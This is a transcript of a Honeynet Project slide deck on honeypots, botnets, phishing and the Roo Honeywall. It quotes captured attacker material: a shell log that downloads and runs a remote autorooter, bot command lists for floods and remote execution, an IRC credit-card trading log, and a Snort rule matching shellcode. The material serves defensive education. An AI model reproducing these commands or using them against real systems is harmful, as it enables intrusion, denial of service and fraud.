Honeynets and The Honeynet Project - PowerPoint PPT Presentation

About This Presentation
Title:

Honeynets and The Honeynet Project

Description:

May, 2003 - Released Eeyore. May, 2005 - Released Roo. 52. Eeyore Problems. OS too minimized, almost crippled. Could not easily add functionality. ... – PowerPoint PPT presentation

Number of Views:385
Avg rating:3.0/5.0
Slides: 79
Provided by: tri5237
Category:

less

Transcript and Presenter's Notes

Title: Honeynets and The Honeynet Project


1
Honeynets and The Honeynet Project
2
Speaker
3
Purpose
  • To explain our organization, our value to you,
    and our research.

4
Agenda
  • The Honeynet Project and Research Alliance
  • The Threat
  • How Honeynets Work
  • Learning More

5
Honeynet Project
6
Problem
  • How can we defend against an enemy, when we dont
    even know who the enemy is?

7
Mission Statement
  • To learn the tools, tactics, and motives
    involved in computer and network attacks, and
    share the lessons learned.

8
Our Goal
  • Improve security of Internet at no cost to the
    public.
  • Awareness Raise awareness of the threats that
    exist.
  • Information For those already aware, we teach
    and inform about the threats.
  • Research We give organizations the capabilities
    to learn more on their own.

9
Honeynet Project
  • Non-profit (501c3) organization with Board of
    Directors.
  • Funded by sponsors
  • Global set of diverse skills and experiences.
  • Open Source, share all of our research and
    findings at no cost to the public.
  • Deploy networks around the world to be hacked.
  • Everything we capture is happening in the wild.
  • We have nothing to sell.

10
Honeynet Research Alliance
  • Starting in 2002, the Alliance is a forum of
    organizations around the world actively
    researching, sharing and deploying honeypot
    technologies.
  • http//www.honeynet.org/alliance/

11
Alliance Members
  • South Florida Honeynet Project
  • Georgia Technical Institute
  • Azusa Pacific University
  • USMA Honeynet Project
  • Pakistan Honeynet Project
  • Paladion Networks Honeynet Project (India)
  • Internet Systematics Lab Honeynet Project
    (Greece)
  • Honeynet.BR (Brazil)
  • UK Honeynet
  • French Honeynet Project
  • Italian Honeynet Project
  • Portugal Honeynet Project
  • German Honeynet Project
  • Spanish Honeynet Project
  • Singapore Honeynet Project
  • China Honeynet Project

12
The Threat
13
What we have captured
  • The Honeynet Project has captured primarily
    external threats that focus on targets of
    opportunity.
  • Little has yet to be captured on advanced
    threats, few honeynets to date have been designed
    to capture them.

14
The Threat
  • Hundreds of scans a day.
  • Fastest time honeypot manually compromised, 15
    minutes (worm, under 60 seconds).
  • Life expectancies vulnerable Win32 system is
    under three hours, vulnerable Linux system is
    three months.
  • Primarily cyber-crime, focus on Win32 systems and
    their users.
  • Attackers can control thousands of systems
    (Botnets).

15
The Threat
16
The Motive
  • Motives vary, but we are seeing more and more
    criminally motivated.
  • Several years ago, hackers hacked computers.
    Now, criminals hack computers.
  • Fraud, extortion and identity theft have been
    around for centuries, the net just makes it
    easier.

17
DDoS for Money
J4ck why don't you start charging for packet
attacks? J4ck "give me x amount and I'll take
bla bla offline for this amount of
time J1LL it was illegal last I checked J4ck
heh, then everything you do is illegal. Why not
make money off of it? J4ck I know plenty of
people that'd pay exorbatent amounts for
packeting
18
The Target
  • The mass users.
  • Tend to be non-security aware, making them easy
    targets.
  • Economies of scale (its a global target).

19
Interesting Trends
  • Attacks often originate from economically
    depressed countries (Romania is an example).
  • Attacks shifting from the computer to the user
    (computers getting harder to hack).
  • Attackers continue to get more sophisticated.

20
The Tools
  • Attacks used to be primarily worms and
    autorooters.
  • New advances include Botnets and Phishing.
  • Tools are constantly advancing.

21
The Old Days
Jan 8 184812 HISTORY PID1246 UID0 lynx
www.becys.org/LUCKROOT.TAR Jan 8 184831
HISTORY PID1246 UID0 y Jan 8 184845 HISTORY
PID1246 UID0 tar -xvfz LUCKROOT.TAR Jan 8
184859 HISTORY PID1246 UID0 tar -xzvf Lu Jan
8 184901 HISTORY PID1246 UID0 tar -xzvf
L Jan 8 184903 HISTORY PID1246 UID0 tar
-xzvf LUCKROOT.TAR Jan 8 184906 HISTORY
PID1246 UID0 cd luckroot Jan 8 184913
HISTORY PID1246 UID0 ./luckgo 216 210 Jan 8
185107 HISTORY PID1246 UID0 ./luckgo 200
120 Jan 8 185143 HISTORY PID1246 UID0
./luckgo 64 120 Jan 8 185200 HISTORY PID1246
UID0 ./luckgo 216 200
22
Botnets
  • Large networks of hacked systems.
  • Often thousands, if not tens of thousands, of
    hacked systems under the control of a single
    user.
  • Automated commands used to control the zombies.

23
How They Work
  • After successful exploitation, a bot uses TFTP,
    FTP, or HTTP to download itself to the
    compromised host.
  • The binary is started, and connects to the
    hard-coded master IRC server.
  • Often a dynamic DNS name is provided rather than
    a hard coded IP address, so the bot can be easily
    relocated.
  • Using a special crafted nickname like USA743634
    the bot joins the master's channel, sometimes
    using a password to keep strangers out of the
    channel

24
80 of traffic
  • Port 445/TCP
  • Port 139/TCP
  • Port 135/TCP
  • Port 137/UDP
  • Infected systems most often WinXP-SP1 and Win2000

25
Bots
ddos.synflood host time delay port starts
an SYN flood ddos.httpflood url number
referrer recursive truefalse starts a
HTTP flood scan.listnetranges list scanned
netranges scan.start starts all enabled
scanners scan.stop stops all scanners http.downl
oad download a file via HTTP http.execute updates
the bot via the given HTTP URL http.update execu
tes a file from a given HTTP URL cvar.set
spam_aol_channel channel AOL Spam - Channel
name cvar.set spam_aol_enabled 1/0 AOL Spam -
Enabled?
26
Numbers
  • Over a 4 months period
  • More then 100 Botnets were tracked
  • One channel had over 200,000 IP addresses.
  • One computer was compromised by 16 Bots.
  • Estimate over 1 millions systems compromised.

27
Botnet Economy
  • Botnets sold or for rent.
  • Saw Botnets being stolen from each other.
  • Observed harvesting of information from all
    compromised machines. For example, the operator
    of the botnet can request a list of CD-keys (e.g.
    for Windows or games) from all bots. These
    CD-keys can be sold or used for other purposes
    since they are considered valuable information.

28
Phishing
  • Social engineer victims to give up valuable
    information (login, password, credit card number,
    etc).
  • Easier to hack the user then the computers.
  • Need attacks against instant messaging.
  • http//www.antiphishing.org

29
The Sting
30
Getting the Info
31
Infrastructure
  • Attackers build network of thousands of hacked
    systems (often botnets).
  • Upload pre-made pkgs for Phishing.
  • Use platforms for sending out spoofed email.
  • Use platforms for false websites.

32
A Phishing Rootkit
  • -rw-r--r-- 1 free web 14834 Jun 17 1316
    ebay only
  • -rw-r--r-- 1 free web 247127 Jun 14 1958
    emailer2.zip
  • -rw-r--r-- 1 free web 7517 Jun 11 1153
    html1.zip
  • -rw-r--r-- 1 free web 10383 Jul 3 1907
    index.html
  • -rw-r--r-- 1 free web 413 Jul 18 2209
    index.zip
  • -rw-r--r-- 1 free web 246920 Jun 14 2038
    massmail.tgz
  • -rw-r--r-- 1 free web 8192 Jun 12 0718
    massmail.zip
  • -rw-r--r-- 1 free web 12163 Jun 9 0131
    send.php
  • -rw-r--r-- 1 free web 2094 Jun 20 1149
    sendspamAOL1.tgz
  • -rw-r--r-- 1 free web 2173 Jun 14 2258
    sendspamBUN1.tgz
  • -rw-r--r-- 1 free web 2783 Jun 15 0021
    sendspamBUNzip1.zip
  • -rw-r--r-- 1 free web 2096 Jun 16 1846
    sendspamNEW1.tgz
  • -rw-r--r-- 1 free web 1574 Jul 11 0108
    sendbank1.tgz
  • -rw-r--r-- 1 free web 2238 Jul 18 2307
    sendbankNEW.tgz
  • -rw-r--r-- 1 free web 83862 Jun 9 0956
    spamz.zip
  • -rw-r--r-- 1 free web 36441 Jul 18 0052
    usNEW.zip
  • -rw-r--r-- 1 free web 36065 Jul 11 1704
    bank1.tgz
  • drwxr-xr-x 2 free web 49 Jul 16 1226 banka
  • -rw-r--r-- 1 free web 301939 Jun 8 1317
    www1.tar.gz

33
Credit Cards Exchanging
045516 COCO_JAA !cc 045523 Chk 0,19(0
COCO_JAA 9)0 CC for U 4,1 Bob JohnsP. O.
Box 126Wendel, CA 25631United
States510-863-48844407070000588951 06/05
(All This ccs update everyday From My Hacked
shopping Database - You must regular come here
for got all this ccs) 8 9(11 TraDecS Chk_Bot
FoR goldcard9) 045542 COCO_JAA !cclimit
4407070000588951 045546 Chk 0,19(0 COCO_JAA
9)0 Limit for Ur MasterCard (5407070000788951)
0.881 (This Doesn't Mean Its Valid) 4 0(11
TraDecS Chk_bot FoR channel) 045655 COCO_JAA
!cardablesite 045722 COCO_JAA !cardable
electronics 045727 Chk 0,19(0 COCO_JAA 9)0
Site where you can card electronics 9(11
TraDecS Chk_bot FoR goldcard9) 045809
COCO_JAA !cclimit 4234294391131136 045812
Chk 0,19(0 COCO_JAA 9)0 Limit for Ur Visa
(4264294291131136) 9.697 (This Doesn't Mean
Its Valid) 4 0(11 TraDecS Chk_bot FoR channel)
34
The Future
  • Hacking is profitable and difficult to get
    caught.
  • Expect more attacks to focus on the end user or
    the client.
  • Expect things to get worse, bad guys adapt faster.

35
Honeynets
36
Honeypots
  • A honeypot is an information system resource
    whose value lies in unauthorized or illicit use
    of that resource.
  • Has no production value, anything going to or
    from a honeypot is likely a probe, attack or
    compromise.
  • Primary value to most organizations is
    information.

37
Advantages
  • Collect small data sets of high value.
  • Reduce false positives
  • Catch new attacks, false negatives
  • Work in encrypted or IPv6 environments
  • Simple concept requiring minimal resources.

38
Disadvantages
  • Limited field of view (microscope)
  • Risk (mainly high-interaction honeypots)

39
Types
  • Low-interaction
  • Emulates services, applications, and OSs.
  • Low risk and easy to deploy/maintain, but capture
    limited information.
  • High-interaction
  • Real services, applications, and OSs
  • Capture extensive information, but high risk and
    time intensive to maintain.

40
Examples of Honeypots
Low Interaction
  • BackOfficer Friendly
  • KFSensor
  • Honeyd
  • Honeynets

High Interaction
41
Honeynets
  • High-interaction honeypot designed to capture
    in-depth information.
  • Information has different value to different
    organizations.
  • Its an architecture you populate with live
    systems, not a product or software.
  • Any traffic entering or leaving is suspect.

42
How it works
  • A highly controlled network where every packet
    entering or leaving is monitored, captured, and
    analyzed.
  • Data Control
  • Data Capture
  • Data Analysis

http//www.honeynet.org/papers/honeynet/
43
Honeynet Architecture
44
Data Control
  • Mitigate risk of honeynet being used to harm
    non-honeynet systems.
  • Count outbound connections.
  • IPS (Snort-Inline)
  • Bandwidth Throttling

45
No Data Control
46
Data Control
47
Snort-Inline
alert tcp EXTERNAL_NET any -gt HOME_NET 53
(msg"DNS EXPLOIT named"flags A
content"CD80 E8D7 FFFFFF/bin/sh" alert tcp
EXTERNAL_NET any -gt HOME_NET 53 (msg"DNS
EXPLOIT named"flags A content"CD80 E8D7
FFFFFF/bin/sh" replace"0000 E8D7
FFFFFF/ben/sh")
48
Data Capture
  • Capture all activity at a variety of levels.
  • Network activity.
  • Application activity.
  • System activity.

49
Sebek
  • Hidden kernel module that captures all host
    activity
  • Dumps activity to the network.
  • Attacker cannot sniff any traffic based on magic
    number and dst port.

50
Sebek Architecture
51
Honeywall CDROM
  • Attempt to combine all requirements of a
    Honeywall onto a single, bootable CDROM.
  • May, 2003 - Released Eeyore
  • May, 2005 - Released Roo

52
Eeyore Problems
  • OS too minimized, almost crippled. Could not
    easily add functionality.
  • Difficult to modify since LiveCD.
  • Limited distributed capabilities
  • No GUI administration
  • No Data Analysis
  • No international or SCSI support

53
Roo Honeywall CDROM
  • Based on Fedora Core 3
  • Vastly improved hardware and international
    support.
  • Automated, headless installation
  • New Walleye interface for web based
    administration and data analysis.
  • Automated system updating.

54
Installation
  • Just insert CDROM and boot, it installs to local
    hard drive.
  • After it reboots for the first time, it runs a
    hardening script based on NIST and CIS security
    standards.
  • Following installation, you get a command prompt
    and system is ready to configure.

55
First Boot
56
Install
57
Configure
58
3 Methods to Maintain
  • Command Line Interface
  • Dialog Interface
  • Web GUI (Walleye)

59
Command Line Interface
  • Local or SSH access only.
  • Use the utility hwctl to modify configurations
    and restart services.
  • hwctl HwTCPRATE30

60
Dialog Menu
61
Data Administration
62
Data Analysis
  • Most critical part, the purpose of a honeynet is
    to gather information and learn.
  • Need a method to analyze all the different
    elements of information.
  • Walleye is the new solution, comes with the CDROM.

63
Walleye
64
Data Analysis
65
Data Analysis Flows
66
Data Analysis Details
67
Processes
68
Files
69
Distributed Capabilities
70
Issues
  • Require extensive resources to properly maintain.
  • Detection and anti-honeynet technologies have
    been introduced.
  • Can be used to attack or harm other non-Honeynet
    systems.
  • Privacy can be a potential issue.

71
Legal Contact for .mil / .gov
  • Department of Justice Computer Crime and
    Intellectual Property Section.
  • Paul Ohm
  • Number (202) 514.1026
  • E-Mail paul.ohm_at_usdoj.gov

72
Learning More
73
Our Website
  • Know Your Enemy papers.
  • Scan of the Month Challenges
  • Latest Tools and Technologies
  • http//www.honeynet.org/

74
Our Book
http//www.honeynet.org/book
75
Sponsoring
Advanced Network Management Lab
YOU?
76
How to Sponsor
  • Sponsor development of a new tool
  • Sponsor authorship of a new research paper.
  • Sponsor research and development.
  • Buy our book

ltproject_at_honeynet.orggt http//www.honeynet.org/fun
ds/
77
Conclusion
  • The Honeynet Project is a non-profit, research
    organization improving the security of the
    Internet at no cost to the public by providing
    tools and information on cyber security threats.

78
  • http//www.honeynet.org
  • ltproject_at_honeynet.orggt
Write a Comment
User Comments (0)
About PowerShow.com